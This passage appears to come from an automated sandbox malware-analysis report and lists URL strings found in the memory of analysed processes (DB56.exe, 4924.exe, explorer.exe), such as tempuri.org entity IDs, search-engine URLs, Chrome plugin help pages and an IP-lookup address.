                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631215292.0000000002C4B000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631282609.0000000002C53000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626049960.0000000002E90000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630150085.0000000002A95000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: explorer.exe, 00000005.00000000.372654179.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403688528.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.389556354.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: 8CE5.exe.5.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeMz
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: DB56.exe, 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab4
                      Source: 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabP
                      Source: 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: DB56.exe, 00000012.00000002.632485022.0000000003F8E000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627799023.0000000002FE8000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629340657.0000000003095000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.633050720.000000000410A000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627956315.0000000002FFE000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629465096.00000000030BB000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630822590.0000000003268000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.627635657.0000000002FBF000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631061376.000000000328F000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.632313973.0000000003EDD000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632026724.0000000002DC4000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631833709.0000000002D85000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632829047.0000000002FEB000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631906043.0000000002DAE000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632753160.0000000002FC5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632145595.0000000002E18000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632075065.0000000002DF1000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: 8CE5.exe.5.drString found in binary or memory: https://www.digicert.com/CPS0
